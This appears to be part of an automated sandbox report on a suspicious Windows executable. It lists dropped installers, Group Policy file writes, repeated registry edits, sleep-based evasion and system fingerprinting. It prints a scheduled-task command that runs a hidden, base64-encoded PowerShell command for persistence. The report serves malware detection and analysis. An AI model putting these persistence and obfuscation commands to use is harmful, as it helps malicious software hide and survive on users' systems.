Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4404:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4892:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exeStatic file information: File size 7648603 > 1048576

Data Obfuscation

barindex
Suspicious powershell command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413954 push eax; ret
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413CC0 push eax; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_0361C2E1 push es; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_0693E8E0 push es; ret
Source: file.exeStatic PE information: section name: .sxdata
Source: Install.exe.0.drStatic PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Persistence and Installation Behavior

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeFile created: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exeFile created: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bltLOfaNnqcomuNOFZ.jobJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep count: 2492 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9771
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2492
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040553A FindFirstFileA,
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\__data__\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user~1\AppData\Local\Temp\
